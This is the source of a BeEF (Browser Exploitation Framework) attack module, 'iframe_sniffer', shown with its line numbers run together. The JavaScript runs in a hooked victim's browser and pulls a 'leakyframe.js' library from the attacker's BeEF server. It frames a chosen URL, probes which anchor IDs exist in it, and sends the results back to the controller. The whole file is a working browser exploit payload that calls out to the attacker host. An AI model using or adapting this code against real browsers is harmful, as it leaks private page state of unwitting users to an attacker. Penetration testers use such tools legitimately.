Path: blob/master/modules/misc/iframe_sniffer/command.js
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//567beef.execute(function() {8var inputURL = '<%= @inputUrl %>';9var anchorsToCheck = '<%= @anchorsToCheck %>';10var arrayOfAnchorsToCheck = [];1112//the anchors should be seperated with ','13//remove tabs, newlines, carriage returns and spaces14anchorsToCheck = anchorsToCheck.replace(/[ \t\r\n]/g,'');15arrayOfAnchorsToCheck = anchorsToCheck.split(',');1617var resultList = [];18var resultString = '';1920//check if the leakyframe library is loaded21//if not add it to the DOM22if (typeof LeakyFrame !== 'function'){23var leakyscript = document.createElement('script');2425leakyscript.setAttribute('type', 'text/javascript');26leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js');27var theparent = document.getElementsByTagName('head')[0];28theparent.insertBefore(leakyscript, theparent.firstChild);29}3031var timeout = 100;3233//give the DOM some time to load the library34poll = function(){35setTimeout(function(){36timeout--;37if (typeof LeakyFrame === 'function') {38new LeakyFrame(inputURL,39function(frame){40//check each anchor41for (var anchor = 0; anchor < arrayOfAnchorsToCheck.length; anchor++){42if (frame.checkID(arrayOfAnchorsToCheck[anchor])){43resultList.push('Exists');44}45else{46resultList.push('Does not exist');47}48}49frame.remove();5051//create the resultstring52for (var i = 0; i < resultList.length; i++){53resultString = resultString + '#' + arrayOfAnchorsToCheck[i] + ' ' + resultList[i] + '; ';54}5556beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result: ' + resultString);57},false);58}59else if (timeout > 0){60poll();61}62else {63beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occured!');64}65}, 100);66};6768poll();69});70717273